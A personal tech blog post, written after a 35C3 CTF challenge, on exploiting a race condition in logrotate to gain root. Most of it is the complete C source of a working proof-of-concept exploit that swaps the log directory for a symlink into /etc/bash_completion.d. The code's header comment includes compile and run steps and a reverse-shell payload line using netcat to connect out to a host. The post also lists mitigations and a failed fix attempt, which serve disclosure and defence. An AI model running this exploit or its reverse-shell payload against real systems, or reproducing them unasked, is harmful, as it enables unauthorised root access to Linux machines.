Sysadmin https://tech.feedyourhead.at/tags/sysadmin en Abusing a race condition in logrotate to elevate privileges https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges <span class="field field--name-title field--type-string field--label-hidden">Abusing a race condition in logrotate to elevate privileges</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Together with a friend we took part of the Capture The Flag at the 35C3. One challenge was that one:</p> <blockquote> <p>Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.</p> </blockquote> <p>After searching at google I found out about a race condition in logrotate. In many <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=400198">bug reports</a> it was stated that a race condition exists <s>if logrotate gets executed with the "create" option</s>. A very detailed and brilliant analysis of the problem could be found at the blog of the <a href="https://blog.nsogroup.com/logrotate-zajebiste-500-points/">nsogroup</a>. Their exploit was very specific for the CTF challenge and it needs a suid binary that executes run-parts(cron). It worked for the CTF and I guess they earned their points. I was too slow and did not solve the challenge but I tried to finish it at home. My approach was to use inotify on /tmp/log/pwn.log to trigger the race. It seems that the logrotate bug could be exploited on live environments.</p> <h3>Requirements</h3> <p>In order to exploit this vulnerability for privilege escalation the following requirements must be met:</p> <ul> <li>logrotate has to be run as user root</li> <li>an unprivileged user has to be in control of the logdir-path</li> <li>the configfile should include the "create"-option.</li> </ul> <p>An attacker could elevate his privileges by writing reverse-shells into directories like "/etc/bash_completition.d/". This is how the logrotate-config looks like:</p> <pre> <code> /tmp/log/pwnme.log { daily rotate 12 missingok notifempty size 1k create } </code></pre> <p>My unprivileged user is totally in control of /tmp/log/:</p> <pre> <code> osboxes@osboxes:~$ ls -l /tmp/log total 2940 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.0 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.1 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.10 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.11 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.12 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.13 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.2 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.3 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.4 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.5 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.6 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.7 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.8 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.9 osboxes@osboxes:~$ ls -ld /tmp/log drwxr-xr-x 2 osboxes osboxes 4096 Jan 14 15:34 /tmp/log </code></pre> <h3>Exploit</h3> <p>The vulnerability can be triggerd by replacing /tmp/log by a symlink to /etc/bash_completition.d after /tmp/log/pwnme.log got renamed. I wrote the following <a href="https://github.com/whotwagner/logrotten">Exploit</a>:</p> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;">&nbsp; <span style="color: #808080; font-style: italic;">/* * logrotate poc exploit * * [ Brief description ] * - logrotate is prone to a race condition after renaming the logfile. * - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories. * - An attacker could elevate his privileges by writing reverse-shells into * directories like &quot;/etc/bash_completition.d/&quot;. * - This vulnerability was found during a challenge at the 35c3 CTF * ( https://ctftime.org/event/718 ) * - A detailed description and a PoC of this challenge was written by the * - nsogroup ( https://blog.nsogroup.com/logrotate-zajebiste-500-points/ ) * * [ Precondition for privilege escalation ] * - Logrotate needs to be executed as root * - The logpath needs to be in control of the attacker * - &quot;create&quot; option is set in the logrotate configuration. * This exploit might not work without * * [ Tested version ] * - Debian GNU/Linux 9.5 (stretch) * - Amazon Linux 2 AMI (HVM) * - Ubuntu 18.04.1 * - logrotate 3.8.6 * - logrotate 3.11.0 * - logrotate 3.15.0 * * [ Compile ] * - gcc -o logrotten logrotten.c * * [ Prepare payload ] * - echo &quot;if [ `id -u` -eq 0 ]; /bin/nc -e /bin/bash myhost 3333 &amp;; fi&quot; &gt; payloadfile * * [ Run exploit ] * - nice -n -20 ./logrotten /tmp/log/pwnme.log payloadfile * * [ Known Problems ] * - It's hard to win the race inside a docker container * * [ Mitigation ] * - make sure that logpath is owned by root * - or use option &quot;nocreate&quot; * * [ Author ] * - Wolfgang Hotwagner * * [ Contact ] * - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges * - https://github.com/whotwagner/logrotten */</span> &nbsp; <span style="color: #339933;">#include &lt;stdio.h&gt;</span> <span style="color: #339933;">#include &lt;stdlib.h&gt;</span> <span style="color: #339933;">#include &lt;errno.h&gt;</span> <span style="color: #339933;">#include &lt;sys/types.h&gt;</span> <span style="color: #339933;">#include &lt;sys/inotify.h&gt;</span> <span style="color: #339933;">#include &lt;unistd.h&gt;</span> <span style="color: #339933;">#include &lt;string.h&gt;</span> <span style="color: #339933;">#include &lt;alloca.h&gt;</span> <span style="color: #339933;">#include &lt;sys/stat.h&gt;</span> &nbsp; &nbsp; <span style="color: #339933;">#define EVENT_SIZE ( sizeof (struct inotify_event) )</span> <span style="color: #339933;">#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )</span> &nbsp; <span style="color: #808080; font-style: italic;">/* use TARGETDIR without &quot;/&quot; at the end */</span> <span style="color: #339933;">#define TARGETDIR &quot;/etc/bash_completion.d&quot;</span> &nbsp; <span style="color: #339933;">#define DEBUG 1</span> &nbsp; <span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #993333;">int</span> argc<span style="color: #339933;">,</span> <span style="color: #993333;">char</span><span style="color: #339933;">*</span> argv<span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">int</span> length<span style="color: #339933;">,</span> i <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> index <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> fd<span style="color: #339933;">;</span> <span style="color: #993333;">int</span> wd<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> buffer<span style="color: #009900;">&#91;</span>EVENT_BUF_LEN<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>payloadfile<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logfile<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath2<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetdir<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> ch<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>p<span style="color: #339933;">;</span> FILE <span style="color: #339933;">*</span>source<span style="color: #339933;">,</span> <span style="color: #339933;">*</span>target<span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fprintf.html"><span style="color: #000066;">fprintf</span></a><span style="color: #009900;">&#40;</span>stderr<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;usage: %s &lt;logfile&gt; &lt;payloadfile&gt; [targetdir]<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; logfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> payloadfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j<span style="color: #339933;">=</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">!=</span> <span style="color: #ff0000;">'/'</span> <span style="color: #339933;">&amp;&amp;</span> j <span style="color: #339933;">!=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j<span style="color: #339933;">--</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; index <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #339933;">;</span> &nbsp; p <span style="color: #339933;">=</span> <span style="color: #339933;">&amp;</span>logfile<span style="color: #009900;">&#91;</span>index<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; logpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2 <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&gt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> targetdir <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span> targetdir<span style="color: #339933;">=</span> TARGETDIR<span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j <span style="color: #339933;">&lt;</span> index<span style="color: #339933;">;</span> j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcpy.html"><span style="color: #000066;">strcpy</span></a><span style="color: #009900;">&#40;</span>logpath2<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'2'</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*creating the INOTIFY instance*/</span> fd <span style="color: #339933;">=</span> inotify_init<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span> DEBUG <span style="color: #339933;">==</span> <span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logfile: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath2: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetdir: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetdir<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;p: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*checking for error*/</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> fd <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">0</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/perror.html"><span style="color: #000066;">perror</span></a><span style="color: #009900;">&#40;</span> <span style="color: #ff0000;">&quot;inotify_init&quot;</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; wd <span style="color: #339933;">=</span> inotify_add_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span>logpath<span style="color: #339933;">,</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">while</span><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> i<span style="color: #339933;">=</span><span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> length <span style="color: #339933;">=</span> read<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> buffer<span style="color: #339933;">,</span> EVENT_BUF_LEN <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span>i <span style="color: #339933;">&lt;</span> length<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span>event <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span> <span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;</span>buffer<span style="color: #009900;">&#91;</span> i <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>len <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>mask <span style="color: #339933;">&amp;</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcmp.html"><span style="color: #000066;">strcmp</span></a><span style="color: #009900;">&#40;</span>event<span style="color: #339933;">-&gt;</span>name<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span> <span style="color: #339933;">==</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #808080; font-style: italic;">/* printf( &quot;Something is moved %s.\n&quot;, event-&gt;name ); */</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/rename.html"><span style="color: #000066;">rename</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> symlink<span style="color: #009900;">&#40;</span>targetdir<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> sleep<span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> source <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>payloadfile<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;r&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>source <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; target <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;w&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>target <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span>ch <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fgetc.html"><span style="color: #000066;">fgetc</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> EOF<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fputc.html"><span style="color: #000066;">fputc</span></a><span style="color: #009900;">&#40;</span>ch<span style="color: #339933;">,</span> target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; chmod<span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>S_IRUSR <span style="color: #339933;">|</span> S_IXUSR <span style="color: #339933;">|</span> S_IRGRP <span style="color: #339933;">|</span> S_IXGRP <span style="color: #339933;">|</span> S_IROTH <span style="color: #339933;">|</span> S_IXOTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> i <span style="color: #339933;">+=</span> EVENT_SIZE <span style="color: #339933;">+</span> event<span style="color: #339933;">-&gt;</span>len<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #808080; font-style: italic;">/*removing from the watch list.*/</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*closing the INOTIFY instance*/</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div> <p>As soon as root logs in, the reverse shell gets executed with root privileges.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/logrotate2.mp4" type="video/mp4" /></video> </p> <p>&nbsp;</p> <h3>Known Issues</h3> <p>I wasn't able to win the race inside a docker container.</p> <p>&nbsp;</p> <h3>Update</h3> <p>I disgraced myself by trying to fix this without much knowledge about race conditions. Not only that my fix opened a memory leak by not freeing lstat()-space, it also didn't fix the problem(. I tried to check if the path contains a symlink right before the open() for the file touching happens. This made the time window a bit smaller and it was enough for this exploit. But a time window still exists. I am even not sure if a proper solution for that problem exist, without changing a lot of code and without creating other problems.&nbsp;</p> <p>Even if I feel quite bad for my failed attempt to fix this and for my very sloppy code, I learned a lot from this experience.</p> <p>&nbsp;</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 14 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" 